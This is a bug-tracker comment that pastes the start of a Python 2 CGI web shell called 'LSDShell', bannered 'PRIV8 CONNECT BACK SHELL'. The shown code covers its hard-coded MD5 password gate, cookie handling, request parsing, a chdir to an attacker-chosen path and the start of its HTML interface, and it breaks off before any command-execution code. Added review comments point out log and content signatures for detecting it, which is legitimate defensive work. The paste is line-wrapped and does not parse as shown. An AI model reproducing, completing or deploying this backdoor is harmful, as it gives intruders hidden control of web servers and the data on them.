https://bz.apache.org/bugzilla/show_bug.cgi?id=69003
--- Comment #1 from flm2r ---
#!/usr/bin/python
import sys, os, cgi, commands, time, Cookie, socket, pty,select
from base64 import b64encode
from stat import *
from datetime import datetime
# NOTE(review): this file is a Python 2 CGI script that labels itself "LSDShell"
# (see printHeader) and "CONNECT BACK SHELL" (see the banner below). Treat it as
# a sample for analysis and detection, not as application code.
# Everything written to stderr from here on is discarded, tracebacks included.
sys.stderr = open(os.devnull, 'w')
# Hard-coded 32-hex-character digest. The access check further down compares
# both the `psswd` cookie and the MD5 hexdigest of the `psswd` form field
# against this constant.
password = "27db7898211c8ccbeb4d5a97d198839a" # root
# Version label; printHeader concatenates it into the page output.
version = "0.5 [PRIV9]"
# ANSI escape prefix (ESC followed by '['), then the "1;36m" and "0m" sequences
# built from it. They wrap the banner text defined below.
esc = '%s['%chr(27)
color = esc + "1;36m"
reset = esc + "0m"
# Banner text, built by repeated string concatenation and wrapped in the ANSI
# colour and reset sequences defined above. The literal
# "P R I V 8 C O N N E C T B A C K S H E L L" line is a fixed string, so it can
# serve as a content signature when scanning web roots or uploads.
# NOTE(review): the code that emits this banner is not in view; the pty, select
# and socket imports suggest it is written to an interactive session. Confirm
# against the rest of the file.
# NOTE(review): this paste is line-wrapped, so several of the string literals
# below are split across two lines and will not parse as shown.
# don't ask why i did it this way, ''' doesnt agree with pty's
ascii =
color
ascii +=' @@@ @@@ @@@ @@@ @@@ @@@ @@@ @@@ @@@ @@ @@
@@@ \r\n'#
ascii +=' !@@ @@! @@@ @@! @@! @@@ @@! @@@ @@! !@@ @@@ @@! @@!
@@!\r\n'#
ascii +=' !@! @!@!@!@! !!@ @!@@!@! @!@@!@! !@!@! !@! @!!!: @!!!:
@!! \r\n'#
ascii +=' :!! !!: !!! !!: !!: !!:!!:!!! !!: !!:
.!!: \r\n'#
ascii +=' :: :: : : : : ::: .: : ::: :: ::: ::
: : \r\n'#
ascii +=' ~[ P R I V 8 C O N N E C T B A C K S H E L L ]~
\r\n'#
ascii +=
reset###
# Flatten a cgi.FieldStorage-style form into a plain dict and return it.
#   - list-valued field: every value via getlist(), or only the first value via
#     getfirst() when `nolist` is true
#   - field with a filename (an upload): stored in the module-level _FILES dict
#     instead of the returned dict
#   - any other field: its .value
# Every key and value handled here comes straight from the HTTP request; nothing
# is validated or normalised.
# NOTE(review): indentation was lost in this paste. The `else` after getlist()
# must pair with `if not nolist`, because an `elif` follows it.
def getall(theform, nolist = False):
data = {}
for field in theform.keys():
if type(theform[field]) == type([]):
if not nolist:
data[field] = theform.getlist(field)
else:
data[field] = theform.getfirst(field)
elif theform[field].filename:
_FILES[field] = theform[field]
else:
data[field] = theform[field].value
return data
# Return `str` with single quotes, carriage returns and line feeds replaced by
# their backslash-escaped forms (\', \r, \n). Only these three characters are
# handled.
# NOTE(review): no caller is visible in this part of the file. Presumably the
# result is embedded in a single-quoted string in generated page script; confirm.
def escape(str):
return str.replace("'", "\\'").replace("\r", "\\r").replace("\n", "\\n")
# Upload store filled as a side effect of getall().
_FILES = {}
# Parse the current CGI request once, at module load.
_REQUEST = getall( cgi.FieldStorage() )
# Fill defaults for parameters the request did not supply. The parameter names
# (charset, a, c, p1, p2, p3), together with the `psswd` cookie and form field,
# give requests to this script a recognisable shape when reviewing access logs.
if _REQUEST.has_key('charset') == False:
_REQUEST['charset'] = "Windows-1251"
# NOTE(review): `a` looks like an action selector defaulting to "files"; the
# dispatch code is not in view, so confirm.
if _REQUEST.has_key('a') == False:
_REQUEST['a'] = "files"
# `c` defaults to the process working directory; it is passed to os.chdir()
# further down.
if _REQUEST.has_key('c') == False:
_REQUEST['c'] = os.getcwd()
if _REQUEST.has_key('p1') == False:
_REQUEST['p1'] = ""
if _REQUEST.has_key('p2') == False:
_REQUEST['p2'] = ""
if _REQUEST.has_key('p3') == False:
_REQUEST['p3'] = ""
# Load request cookies from the HTTP_COOKIE environment variable. The bare
# except swallows a missing variable as well as any parse error, leaving
# _COOKIE empty.
_COOKIE = Cookie.SimpleCookie()
try:
_COOKIE.load(os.environ["HTTP_COOKIE"])
except:
pass
# Emit the login page and terminate the script.
# Steps: blank the `psswd` cookie, print the cookie object (its header line),
# print the Content-type header, print the page body, then call exit() so that
# nothing after the call site runs.
# NOTE(review): only CSS rules and the text "Password:" survive in the page
# body below. The HTML tags appear to have been stripped when this comment was
# rendered, so the original markup (form, input names) cannot be read from here.
def printLogin():
_COOKIE['psswd'] = "";
print _COOKIE;
print "Content-type: text/html\n";
print """
body{background-color:#444;color:#e1e1e1;}
body,td,th{ font: 9pt
Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
table.info{ color:#fff;background-color:#222; }
span,h1,a{ color:#00cfcf !important; }
span{ font-weight: bolder; }
h1{ border-left:5px solid #df5;padding: 2px 5px;font: 14pt
Verdana;background-color:#222;margin:0px; }
div.content{ padding: 5px;margin-left:5px;background-color:#333; }
a{ text-decoration:none; }
a:hover{ text-decoration:underline; }
.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
.bigarea{ width:100%;height:250px; }
input,textarea,select{
margin:0;color:#00afaf;background-color:#555;border:1px solid #00afcf; font:
24pt Monospace,"Courier New"; }
form{ margin:0px; }
#toolsTbl{ text-align:center; }
.toolsInp{ width: 300px }
.main th{text-align:left;background-color:#5e5e5e;}
.main tr:hover{background-color:#5e5e5e}
.l1{background-color:#444}
pre,.m{font-family:Courier,Monospace;}
Password: """
exit()
# Access gate, evaluated at module load; printLogin() ends the process.
# Case 1: a non-empty `psswd` cookie is present. It must equal the stored
# digest, otherwise the login page is shown. The cookie is compared to the
# digest directly, so authenticated requests carry that digest verbatim in the
# Cookie header. This makes it a searchable indicator in proxy or WAF logs that
# record cookies.
if _COOKIE.has_key('psswd') and len(_COOKIE['psswd'].value) > 0 :
if _COOKIE['psswd'].value != password:
printLogin()
# Case 2: no usable cookie, but the request has a `psswd` field. The field is
# hashed with MD5 (hashlib, falling back to the legacy md5 module when hashlib
# cannot be imported) and its hexdigest compared to the stored digest.
elif _REQUEST.has_key('psswd'):
try:
import hashlib
psswd = hashlib.md5()
except:
import md5
psswd = md5.new()
psswd.update(_REQUEST['psswd'])
if psswd.hexdigest() != password:
printLogin()
else:
# On a match the digest itself becomes the cookie value.
_COOKIE['psswd'] = psswd.hexdigest()
# Case 3: neither cookie nor field was supplied, so show the login page.
else:
printLogin()
# Reached only when the gate passed: print the cookie object (its header line).
print _COOKIE
# Remember the starting directory, then change into the request-supplied `c`
# path. A failed chdir is ignored and the process stays where it was.
home_dir = os.getcwd()
try:
os.chdir(_REQUEST['c'])
except os.error, msg:
pass
# Normalise the working directory string so that it ends with '/'.
cwd = os.getcwd();
if cwd[-1] != '/':
cwd += '/'
def printHeader():
print "Content-type: text/html\n";
print "" + os.environ["SERVER_NAME"] + " -
LSDShell " + version + """
body{background-color:#444;color:#e1e1e1;}
body,td,th{ font: 9pt
Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
table.info{ color:#fff;background-color:#222; }
span,h1,a{ color:#00cfcf !important; }
span{ font-weight: bolder; }
h1{ border-left:5px solid #df5;padding: 2px 5px;font: 14pt
Verdana;background-color:#222;margin:0px; }
div.content{ padding: 5px;margin-left:5px;background-color:#333; }
a{ text-decoration:none; }
a:hover{ text-decoration:underline; }
.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }